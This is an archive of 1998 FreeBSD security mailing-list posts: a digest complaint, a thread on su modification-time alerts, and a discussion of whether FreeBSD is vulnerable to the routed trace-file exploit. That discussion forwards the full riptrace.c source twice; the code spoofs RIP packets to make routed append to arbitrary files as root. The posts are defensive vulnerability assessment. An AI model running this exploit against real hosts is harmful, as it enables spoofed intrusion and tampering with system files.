From owner-freebsd-security Tue Jan 6 17:15:53 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id RAA15625 for security-outgoing; Tue, 6 Jan 1998 17:15:53 -0800 (PST) (envelope-from owner-freebsd-security) Received: from rainey.blueneptune.com (root@rainey.blueneptune.com [207.104.147.238]) by hub.freebsd.org (8.8.7/8.8.7) with SMTP id RAA15619 for ; Tue, 6 Jan 1998 17:15:51 -0800 (PST) (envelope-from michael@blueneptune.com) From: michael@blueneptune.com Received: (from michael@localhost) by rainey.blueneptune.com (8.6.12/8.6.12) id RAA01292 for freebsd-security@freebsd.org; Tue, 6 Jan 1998 17:15:38 -0800 Message-Id: <199801070115.RAA01292@rainey.blueneptune.com> Subject: Long delay on digest version of the list To: freebsd-security@freebsd.org Date: Tue, 6 Jan 1998 17:15:37 -0800 (PST) Reply-To: michael@blueneptune.com X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In an effort to minimize the number of mail messages I get, I tend to subscribe to the digest version of mailing lists, when possible. However, the digest version of this list (freebsd-security) appears to be configured to kick off only when a certain byte-count threshold has been crossed. This is unlike most digested lists I subscribe to, which will also send off a digest every 24 or 48 hours, even though the size threshold has not been reached. During periods of light activity, it can be several days or even weeks between digests, which seems to be counter-productive for a list dealing with security issues. Can we get the digest running on a more timely basis, please? It seems like every 24 hours would be a reasonable interval for the digest. This is very easy to do with Majordomo, just an entry or two in the appropriate crontab will do it. [Yes, I know I can just switch to the non-digest version, but there have been brief periods with high activity, and it was one of those that caused me to decide to switch to the digest version anyway. I think it just makes sense for this particular digest to be sent out in a timely fashion, given the topic of discussion.] -- Michael Bryan michael@blueneptune.com From owner-freebsd-security Thu Jan 8 06:31:50 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id GAA19327 for security-outgoing; Thu, 8 Jan 1998 06:31:50 -0800 (PST) (envelope-from owner-freebsd-security) Received: from hammurabi.nh.ultra.net (hammurabi.nh.ultra.net [205.162.79.24]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id GAA19320 for ; Thu, 8 Jan 1998 06:31:45 -0800 (PST) (envelope-from lhartfor@mtghouse.com) Received: from lucy.portsmouth (paulg.nh.ultranet.com [207.41.158.58]) by hammurabi.nh.ultra.net (8.8.5/ult.n14767) with SMTP id JAA11622 for ; Thu, 8 Jan 1998 09:31:47 -0500 (EST) Received: (qmail 11191 invoked from network); 8 Jan 1998 14:32:50 -0000 Received: from unknown (HELO larry) (192.32.47.65) by 192.32.47.84 with SMTP; 8 Jan 1998 14:32:50 -0000 Date: Thu, 8 Jan 1998 09:40:30 -0500 (EST) From: Lance Hartford X-Sender: lhartfor@larry Reply-To: Lance Hartford To: freebsd-security@freebsd.org Subject: /usr/bin/su modification time changing Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I just installed 2.2.5 on a PC and I received the following portion of message in a security mail that was sent out last night: xyz setuid diffs: 152c152 < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su --- > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su I did a "sum" on the /usr/bin/su on another system onsite, and found that there was no difference compared to the one on this system. Does this imply that there is a security problem at my site? Thanks. Lance From owner-freebsd-security Thu Jan 8 08:46:26 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id IAA01317 for security-outgoing; Thu, 8 Jan 1998 08:46:26 -0800 (PST) (envelope-from owner-freebsd-security) Received: from mailbox.nosc.mil (mailbox.nosc.mil [198.253.34.39]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id IAA01310 for ; Thu, 8 Jan 1998 08:46:23 -0800 (PST) (envelope-from swann@nosc.mil) Received: from localhost (swann@localhost) by mailbox.nosc.mil (8.8.3/8.8.3) with SMTP id LAA01918; Thu, 8 Jan 1998 11:45:47 -0500 (EST) X-Authentication-Warning: mailbox.nosc.mil: swann owned process doing -bs Date: Thu, 8 Jan 1998 11:45:47 -0500 (EST) From: Bryan Swann X-Sender: swann@mailbox To: Lance Hartford cc: freebsd-security@freebsd.org Subject: Re: /usr/bin/su modification time changing In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I believe there are three different times associated with each file, creation time, last access time, last modification time. I assume your message came from tripwire or a similar tool. You can use options to the ls command to determine which of the times have changed. You may find that you need to alter the 'time' your security check monitors for. Best of luck. __________________________________________________________________________ | Bryan Swann (swann@nosc.mil) 803/974-4267 803/974-5080 (Fax) | | Eagan McAllister Associates, Inc. | | | | "Everything must be working perfectly, cause I don't smell any smoke" | -------------------------------------------------------------------------- On Thu, 8 Jan 1998, Lance Hartford wrote: > > I just installed 2.2.5 on a PC and I received the following portion of > message in a security mail that was sent out last night: > > xyz setuid diffs: > 152c152 > < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su > --- > > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su > > I did a "sum" on the /usr/bin/su on another system onsite, and found > that there was no difference compared to the one on this system. Does > this imply that there is a security problem at my site? > > Thanks. > > Lance > > From owner-freebsd-security Thu Jan 8 09:35:29 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id JAA05753 for security-outgoing; Thu, 8 Jan 1998 09:35:29 -0800 (PST) (envelope-from owner-freebsd-security) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id JAA05722 for ; Thu, 8 Jan 1998 09:35:13 -0800 (PST) (envelope-from adam@homeport.org) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id MAA09060; Thu, 8 Jan 1998 12:32:36 -0500 (EST) From: Adam Shostack Message-Id: <199801081732.MAA09060@homeport.org> Subject: Re: /usr/bin/su modification time changing In-Reply-To: from Lance Hartford at "Jan 8, 98 09:40:30 am" To: lhartfor@mtghouse.com Date: Thu, 8 Jan 1998 12:32:35 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Suggest using md5, not sum. Script kiddies have had tools since 1990 or so to fake out sum. diff is also useful. :) Also, I seem to recall that theres a problem with FreeBSD where the OS randomly updates the mod time, but nothing else, of a file. Adam Lance Hartford wrote: | | I just installed 2.2.5 on a PC and I received the following portion of | message in a security mail that was sent out last night: | | xyz setuid diffs: | 152c152 | < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su | --- | > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su | | I did a "sum" on the /usr/bin/su on another system onsite, and found | that there was no difference compared to the one on this system. Does | this imply that there is a security problem at my site? | | Thanks. | | Lance | -- <123> stargate /export/home/adam% passwd passwd: Changing password for adam passwd: adam does not exist From owner-freebsd-security Thu Jan 8 10:26:39 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id KAA11360 for security-outgoing; Thu, 8 Jan 1998 10:26:39 -0800 (PST) (envelope-from owner-freebsd-security) Received: from megaweapon.zigg.com (tcgr-64.dialup.alliance.net [207.74.43.64]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id KAA11336 for ; Thu, 8 Jan 1998 10:26:33 -0800 (PST) (envelope-from matt@megaweapon.zigg.com) Received: from varda.local (varda.local [192.168.0.2]) by megaweapon.zigg.com (8.8.8/8.8.7) with ESMTP id NAA23334; Thu, 8 Jan 1998 13:26:17 -0500 (EST) (envelope-from matt@megaweapon.zigg.com) Received: from localhost (matt@localhost) by varda.local (8.8.8/8.8.7) with SMTP id NAA00267; Thu, 8 Jan 1998 13:25:50 -0500 (EST) (envelope-from matt@megaweapon.zigg.com) X-Authentication-Warning: varda.local: matt owned process doing -bs Date: Thu, 8 Jan 1998 13:25:50 -0500 (EST) From: Matt Behrens X-Sender: matt@varda.local To: Bryan Swann cc: Lance Hartford , freebsd-security@freebsd.org Subject: Re: /usr/bin/su modification time changing In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Thu, 8 Jan 1998, Bryan Swann wrote: > I believe there are three different times associated with each file, > creation time, last access time, last modification time. I assume your > message came from tripwire or a similar tool. You can use options to the > ls command to determine which of the times have changed. You may find > that you need to alter the 'time' your security check monitors for. Lance's message came from the nightly setuid diff check, which comes standard on all versions of FreeBSD I've used, at least. He should probably check into it, someone might be toying with it. (Alternatively, a make world might have updated it...) Matt Behrens | Support the anti-spam amendment! http://www.zigg.com/ | Visit http://www.cauce.org/ From owner-freebsd-security Thu Jan 8 12:30:47 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id MAA25965 for security-outgoing; Thu, 8 Jan 1998 12:30:47 -0800 (PST) (envelope-from owner-freebsd-security) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id MAA25957 for ; Thu, 8 Jan 1998 12:30:37 -0800 (PST) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id MAA18652; Thu, 8 Jan 1998 12:29:11 -0800 (PST) Message-Id: <199801082029.MAA18652@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaatkCa; Thu Jan 8 12:29:04 1998 X-Mailer: exmh version 2.0gamma 1/27/96 Reply-to: Cy Schubert - ITSD Open Systems Group X-Sender: cschuber To: Adam Shostack cc: lhartfor@mtghouse.com, freebsd-security@freebsd.org Subject: Re: /usr/bin/su modification time changing In-reply-to: Your message of "Thu, 08 Jan 1998 12:32:35 EST." <199801081732.MAA09060@homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 08 Jan 1998 12:28:54 -0800 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Suggest using md5, not sum. Script kiddies have had tools since 1990 > or so to fake out sum. > > diff is also useful. :) > > Also, I seem to recall that theres a problem with FreeBSD where the OS > randomly updates the mod time, but nothing else, of a file. The modification time of a file can be changed if breakpoints are set during a gdb session, if a file gets paged out and in some circumstances when mmap() is used. The problem can be reproduced on 2.2.x systems 100% of the time when restore is run. Restore's mod time always gets updated whenever it is run. The problem was more prevelant in 2.0 and 2.1. I understand that fixes to VM and procfs in -current may have fixed this. > > > Adam > > > Lance Hartford wrote: > | > | I just installed 2.2.5 on a PC and I received the following portion of > | message in a security mail that was sent out last night: > | > | xyz setuid diffs: > | 152c152 > | < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su > | --- > | > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su > | > | I did a "sum" on the /usr/bin/su on another system onsite, and found > | that there was no difference compared to the one on this system. Does > | this imply that there is a security problem at my site? > | > | Thanks. > | > | Lance > | > > > -- > <123> stargate /export/home/adam% passwd > passwd: Changing password for adam > passwd: adam does not exist Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 UNIX Support OV/VM: BCSC02(CSCHUBER) ITSD BITNET: CSCHUBER@BCSC02.BITNET Government of BC Internet: cschuber@uumail.gov.bc.ca Cy.Schubert@gems8.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Thu Jan 8 14:53:47 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id OAA12885 for security-outgoing; Thu, 8 Jan 1998 14:53:47 -0800 (PST) (envelope-from owner-freebsd-security) Received: from word.smith.net.au (ppp8.portal.net.au [202.12.71.108]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id OAA12873 for ; Thu, 8 Jan 1998 14:53:35 -0800 (PST) (envelope-from mike@word.smith.net.au) Received: from word (localhost [127.0.0.1]) by word.smith.net.au (8.8.8/8.8.5) with ESMTP id JAA01042; Fri, 9 Jan 1998 09:17:12 +1030 (CST) Message-Id: <199801082247.JAA01042@word.smith.net.au> X-Mailer: exmh version 2.0zeta 7/24/97 To: Lance Hartford cc: freebsd-security@freebsd.org Subject: Re: /usr/bin/su modification time changing In-reply-to: Your message of "Thu, 08 Jan 1998 09:40:30 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 09 Jan 1998 09:17:11 +1030 From: Mike Smith Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > I just installed 2.2.5 on a PC and I received the following portion of > message in a security mail that was sent out last night: > > xyz setuid diffs: > 152c152 > < -r-sr-xr-x 1 root bin 16384 Oct 21 10:19:25 1997 /usr/bin/su > --- > > -r-sr-xr-x 1 root bin 16384 Jan 7 19:40:28 1998 /usr/bin/su > > I did a "sum" on the /usr/bin/su on another system onsite, and found > that there was no difference compared to the one on this system. Does > this imply that there is a security problem at my site? This is a known quirk in 2.x systems. If you are concerned about this sort of thing (ie. you have shell accounts on your system), you might want to look at a tool that uses stronger checksumming (esp. MD5) for verification. Also, you would be *much* better off using the "Live Filesystem" CD for reference rather than another system, as both may have been compromised. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ From owner-freebsd-security Thu Jan 8 14:55:00 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id OAA13015 for security-outgoing; Thu, 8 Jan 1998 14:55:00 -0800 (PST) (envelope-from owner-freebsd-security) Received: from mx1.cso.uiuc.edu (mx1.cso.uiuc.edu [128.174.5.37]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id OAA12990 for ; Thu, 8 Jan 1998 14:54:52 -0800 (PST) (envelope-from igor@alecto.physics.uiuc.edu) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by mx1.cso.uiuc.edu (8.8.8/8.8.8) with SMTP id QAA23420 for <@mailhost.uiuc.edu:security@freebsd.org>; Thu, 8 Jan 1998 16:54:19 -0600 (CST) Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) for security@freebsd.org id QAA14645; Thu, 8 Jan 1998 16:51:45 -0600 From: igor@alecto.physics.uiuc.edu (Igor Roshchin) Message-Id: <199801082251.QAA14645@alecto.physics.uiuc.edu> Subject: riptrace.c (fwd) To: security@freebsd.org Date: Thu, 8 Jan 1998 16:51:45 -0600 (CST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I probably should have tested it myself, but don't have possibility at the moment. So, the question is: Is FreeBSD vulnerable to this or to a modified exploit ? Thanks, IgoR Forwarded message: >From owner-bugtraq@NETSPACE.ORG Thu Jan 8 16:33:44 1998 Approved-By: aleph1@UNDERGROUND.ORG Mime-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY=------------52EC4E226C19 Content-Id: Message-ID: Date: Thu, 8 Jan 1998 15:19:03 -0600 Reply-To: Aleph One Sender: Bugtraq List From: Aleph One Subject: riptrace.c To: BUGTRAQ@NETSPACE.ORG This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --------------52EC4E226C19 Content-Type: TEXT/PLAIN; CHARSET=us-ascii Content-ID: More goodies from rootshell.com. http://www.rootshell.com/archive-Rbf4ahcmxzw5qn2S/199801/riptrace.c /* * BSD 4.4 based routed trace file exploit * * (C) 1997 Rootshell [ http://www.rootshell.com/ ] * * * * routed has the ability for a packet to be sent to the daemon that will * turn on debug mode. The packet is able to specify the file which is * later opened without any checks being placed on that file open. * * Result: You can append to any file on the filesystem. * * The following syscall is made AS ROOT. * * ftrace = fopen(file, "a"); * * This is obviously a LARGE problem. * * Solaris 2.6 seems to ignore these packets and returns the following * error. Mileage may vary.. : * * in.routed[6580]: trace command from 1.2.3.4 - ignored * * Redhat routed was tested and found to check if the packet came from * a valid router. If you spoof the RIP packet from their default * gateway the packet is ACCEPTED. * * Note: Once a trace file is opened you must close the trace file and then * open another file. * * Exploit tested under Linux 2.0.x. * * ps. Just run gated! (http://www.gated.org/) * */ /* File to append to on filesystem with debug output */ #define FILETOCREATE "/tmp/rootshell" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* Send faked UDP packet. */ int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; /* Fill in IP header values. */ ip.ihl = 5; ip.version = 4; ip.tos = 0; ip.tot_len = htons(28 + datalen); ip.id = htons(31337 + (rand()%100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum((char *)&ip, sizeof(ip)); /* Fill in UDP header values. Checksums are unnecassary. */ udp.source = htons(sport); udp.dest = htons(dport); udp.len = htons(8 + datalen); udp.check = (short) 0; /* Copy the headers into our character array. */ memcpy(packet, (char *)&ip, sizeof(ip)); memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp)); memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen); return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0, (struct sockaddr *)sin, sizeof(struct sockaddr_in))); } /* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */ unsigned int lookup(host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr(host); /* Try if it's a "127.0.0.1" style string */ if (addr == -1) /* If not, lookup the host */ { he = gethostbyname(host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list)); } return(addr); } void main(argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s; struct rip rp; if(argc != 4) errs("\nSee http://www.rootshell.com/\n\nUsage: %s \n\ncommand: 3 = trace on, 4 = trace off\n\n",argv[0]); if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err("Unable to open raw socket.\n"); if(!(saddr = lookup(argv[1]))) err("Unable to lookup source address.\n"); if(!(daddr = lookup(argv[2]))) err("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_addr.s_addr= daddr; sin.sin_port = 520; /* Fill in RIP packet info */ rp.rip_cmd = atoi(argv[3]); /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */ rp.rip_vers = RIPVERSION; /* Must be version 1 */ sprintf(rp.rip_tracefile, FILETOCREATE); if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1) { perror("sendpkt_udp"); err("Error sending the UDP packet.\n"); } } --------------52EC4E226C19-- From owner-freebsd-security Thu Jan 8 15:05:43 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id PAA14072 for security-outgoing; Thu, 8 Jan 1998 15:05:43 -0800 (PST) (envelope-from owner-freebsd-security) Received: from panda.hilink.com.au (panda.hilink.com.au [203.8.15.25]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id PAA13708 for ; Thu, 8 Jan 1998 15:02:52 -0800 (PST) (envelope-from danny@panda.hilink.com.au) Received: (from danny@localhost) by panda.hilink.com.au (8.8.5/8.8.5) id KAA08517; Fri, 9 Jan 1998 10:02:11 +1100 (EST) Date: Fri, 9 Jan 1998 10:02:11 +1100 (EST) From: "Daniel O'Callaghan" To: freebsd-security@freebsd.org Subject: riptrace.c Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY=------------52EC4E226C19 Content-ID: Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --------------52EC4E226C19 Content-Type: TEXT/PLAIN; CHARSET=us-ascii Content-ID: >From a brief look at the srcs, FreeBSD seems to be vulnerable. Danny ---------- Forwarded message ---------- Date: Thu, 8 Jan 1998 15:19:03 -0600 From: Aleph One To: BUGTRAQ@NETSPACE.ORG Subject: riptrace.c More goodies from rootshell.com. http://www.rootshell.com/archive-Rbf4ahcmxzw5qn2S/199801/riptrace.c /* * BSD 4.4 based routed trace file exploit * * (C) 1997 Rootshell [ http://www.rootshell.com/ ] * * * * routed has the ability for a packet to be sent to the daemon that will * turn on debug mode. The packet is able to specify the file which is * later opened without any checks being placed on that file open. * * Result: You can append to any file on the filesystem. * * The following syscall is made AS ROOT. * * ftrace = fopen(file, "a"); * * This is obviously a LARGE problem. * * Solaris 2.6 seems to ignore these packets and returns the following * error. Mileage may vary.. : * * in.routed[6580]: trace command from 1.2.3.4 - ignored * * Redhat routed was tested and found to check if the packet came from * a valid router. If you spoof the RIP packet from their default * gateway the packet is ACCEPTED. * * Note: Once a trace file is opened you must close the trace file and then * open another file. * * Exploit tested under Linux 2.0.x. * * ps. Just run gated! (http://www.gated.org/) * */ /* File to append to on filesystem with debug output */ #define FILETOCREATE "/tmp/rootshell" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* Send faked UDP packet. */ int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; /* Fill in IP header values. */ ip.ihl = 5; ip.version = 4; ip.tos = 0; ip.tot_len = htons(28 + datalen); ip.id = htons(31337 + (rand()%100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum((char *)&ip, sizeof(ip)); /* Fill in UDP header values. Checksums are unnecassary. */ udp.source = htons(sport); udp.dest = htons(dport); udp.len = htons(8 + datalen); udp.check = (short) 0; /* Copy the headers into our character array. */ memcpy(packet, (char *)&ip, sizeof(ip)); memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp)); memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen); return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0, (struct sockaddr *)sin, sizeof(struct sockaddr_in))); } /* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */ unsigned int lookup(host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr(host); /* Try if it's a "127.0.0.1" style string */ if (addr == -1) /* If not, lookup the host */ { he = gethostbyname(host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list)); } return(addr); } void main(argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s; struct rip rp; if(argc != 4) errs("\nSee http://www.rootshell.com/\n\nUsage: %s \n\ncommand: 3 = trace on, 4 = trace off\n\n",argv[0]); if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err("Unable to open raw socket.\n"); if(!(saddr = lookup(argv[1]))) err("Unable to lookup source address.\n"); if(!(daddr = lookup(argv[2]))) err("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_addr.s_addr= daddr; sin.sin_port = 520; /* Fill in RIP packet info */ rp.rip_cmd = atoi(argv[3]); /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */ rp.rip_vers = RIPVERSION; /* Must be version 1 */ sprintf(rp.rip_tracefile, FILETOCREATE); if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1) { perror("sendpkt_udp"); err("Error sending the UDP packet.\n"); } } --------------52EC4E226C19-- From owner-freebsd-security Fri Jan 9 08:20:05 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id IAA14871 for security-outgoing; Fri, 9 Jan 1998 08:20:05 -0800 (PST) (envelope-from owner-freebsd-security) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id IAA14811 for ; Fri, 9 Jan 1998 08:19:56 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.8/8.8.5) id LAA08275; Fri, 9 Jan 1998 11:19:48 -0500 (EST) Date: Fri, 9 Jan 1998 11:19:48 -0500 (EST) From: Garrett Wollman Message-Id: <199801091619.LAA08275@khavrinen.lcs.mit.edu> To: igor@alecto.physics.uiuc.edu (Igor Roshchin) Cc: security@FreeBSD.ORG Subject: riptrace.c (fwd) In-Reply-To: <199801082251.QAA14645@alecto.physics.uiuc.edu> References: <199801082251.QAA14645@alecto.physics.uiuc.edu> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk < I probably should have tested it myself, > but don't have possibility at the moment. > So, the question is: > Is FreeBSD vulnerable to this or to a modified exploit ? No. FreeBSD's routed will only permit remote control of tracing under the following conditions: 1) A trace file was specified on the routed command line. 2) The requested trace file is the same as the one specified in (1). See routed/trace.c for details. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick From owner-freebsd-security Sat Jan 10 19:27:54 1998 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id TAA02867 for security-outgoing; Sat, 10 Jan 1998 19:27:54 -0800 (PST) (envelope-from owner-freebsd-security) Received: from gvr.gvr.org (root@gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id TAA02822 for ; Sat, 10 Jan 1998 19:27:37 -0800 (PST) (envelope-from guido@gvr.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.6/8.8.5) id XAA21563; Sat, 10 Jan 1998 23:11:45 +0100 (MET) From: Guido van Rooij Message-Id: <199801102211.XAA21563@gvr.gvr.org> Subject: Re: riptrace.c (fwd) In-Reply-To: <199801091619.LAA08275@khavrinen.lcs.mit.edu> from Garrett Wollman at "Jan 9, 98 11:19:48 am" To: wollman@khavrinen.lcs.mit.edu (Garrett Wollman) Date: Sat, 10 Jan 1998 23:11:44 +0100 (MET) Cc: igor@alecto.physics.uiuc.edu, security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Garrett Wollman wrote: > < > > I probably should have tested it myself, > > but don't have possibility at the moment. > > So, the question is: > > Is FreeBSD vulnerable to this or to a modified exploit ? > > No. FreeBSD's routed will only permit remote control of tracing under > the following conditions: > > 1) A trace file was specified on the routed command line. > 2) The requested trace file is the same as the one specified in (1). > > See routed/trace.c for details. More correctly: freeBSD versions 2.2.* are not vulnerable. 2.1.* and earlier are vulnerable. -Guido